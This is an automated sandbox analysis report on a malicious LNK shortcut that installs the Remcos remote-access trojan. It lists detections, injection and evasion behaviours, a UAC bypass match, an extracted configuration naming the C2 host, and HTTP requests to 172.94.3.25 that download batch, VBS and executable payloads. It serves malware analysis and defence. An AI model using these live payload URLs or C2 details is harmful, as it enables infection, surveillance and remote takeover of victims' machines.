Windows Analysis Report
Dlr7HYI6VL.lnk

Overview

General Information

Sample name: Dlr7HYI6VL.lnk
renamed because original name is a hash value
Original sample name: 383bec1808c99dcffafa9f4e03f104a4.lnk
Analysis ID: 1518489
MD5: 383bec1808c99dcffafa9f4e03f104a4
SHA1: 2f3647ea4331f7848de1c96cef6427b7136ab835
SHA256: be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
Tags: lnkuser-abuse_ch
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\gps Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\demhwk Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\qapuwvr Avira: detection malicious, Label: BDS/Backdoor.Gen
Found malware configuration
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\demhwk ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\gps ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\qapuwvr ReversingLabs: Detection: 86%
Multi AV Scanner detection for submitted file
Source: Dlr7HYI6VL.lnk ReversingLabs: Detection: 15%
Yara detected Remcos RAT
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\gps Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\demhwk Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qapuwvr Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Dlr7HYI6VL.lnk Joe Sandbox ML: detected
Source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3a1bc7b9-5

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DZIPR.exe PID: 5660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 16_2_0040301A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_00402B79
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 17_2_6FA4748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 18_2_6C51748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 23_2_6FAC748E
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: fullimmersion777.com
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Length: 4809996Last-Modified: Wed, 25 Sep 2024 11:52:30 GMTContent-Type: application/x-msdownloadDate: Wed, 25 Sep 2024 16:40:27 GMTETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"Accept-Ranges: bytesServer: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 13 01 00 00 10 00 00 00 14 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 30 00 00 00 30 01 00 00 32 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 29 00 00 00 70 01 00 00 08 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 8d 01 00 00 a0 01 00 00 8e 01 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec 81 ec 00 09 00 00 53 56 57 6a 27 e8 8a 0f 00 00 8b 75 08 ff 76 0c 8b 3d 60 32 41 00 ff 36 50 8d 85 00 f7 ff ff 50 ff d7 83 65 08 00 83 c4 14 83 7e 10 00 76 38 8d 5e 14 ff 33 8d 85 00 ff ff ff 68 10 33 41 00 50 ff d7 83 c4 0c 8d 85 00 ff ff ff 50 8d 85 00 f7 ff ff 50 ff 15 70 31 41 00 ff 45 08 8b 45 08 83 c3 04 3b 46 10 72 cb 8d 85 00 f7 ff ff 50 e8 2c 66 00 00 59 e8 8b 2d 00 00 6a 0a ff 15 74 31 41 00 cc ff 74 24 04 e8 6c ff ff ff cc 33 c0 39 05 e4 77 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 dc 77 41 00 ff 15 f4 32 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 18 00 83 7c 24 08 00 75 07 c7 40 18 01 00 00 00 33 c0 c2 08 00 8b 44 24 04 85 c0 56 8b f1 89 06 74 06 8b 08 50 ff 51 04 8b c6 5e c2 04 00 8b 54 24 04 56 8b 74 24 0c 8b c2 0f b7 0e 66 89 0a 42 42 46 46 66 85 c9 75 f1 5e c3 8b 4c 24 04 33 c0 66 39 01 74 08 40 66 83 3c 41 00 75 f8 c3 53 8b 5c 24 08 56 8b f1 43 3b 5e 08 74 4c 57 33 c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 b4 0a 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 88 0a 01 00 59 8b 46 04 89 3e 66 83 24 47 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VOXILITYGB VOXILITYGB
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /hello.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: global traffic HTTP traffic detected: GET /hello.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: DZIPR.exe.17.dr String found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)
Source: Dlr7HYI6VL.lnk String found in binary or memory: http://172.94.3.25/hello.bat
